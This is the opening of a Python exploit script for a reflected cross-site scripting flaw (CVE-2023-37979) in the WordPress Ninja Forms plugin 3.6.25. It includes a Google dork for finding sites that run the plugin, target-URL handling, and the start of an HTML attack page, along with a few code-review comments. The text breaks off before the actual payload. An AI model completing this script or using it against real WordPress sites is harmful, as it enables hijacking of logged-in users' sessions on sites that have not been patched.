# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979
from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep
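# Values:
# The target base URL is read from the last command-line argument.
# NOTE(review): when no argument is given, argv[-1] is the script's own path,
# and nothing here checks that the value is a URL at all -- callers must pass one.
# rstrip("/") removes every trailing slash and is a no-op on an empty string,
# so the previous `url[-1]` guard (IndexError on an empty argument) is not needed.
url = argv[-1].rstrip("/")

# Constants
# Identifier of the issue this script targets; interpolated into HTML_TEMPLATE.
CVE_NAME = "CVE-2023-37979"
# Plugin release named in the header as affected; its use is outside this excerpt.
VULNERABLE_VERSION = "3.6.25"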
# HTML template
HTML_TEMPLATE = f"""
{CVE_NAME}
Ninja-forms reflected XSS ({CVE_NAME})
Created by Mehran Seifalinia
After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.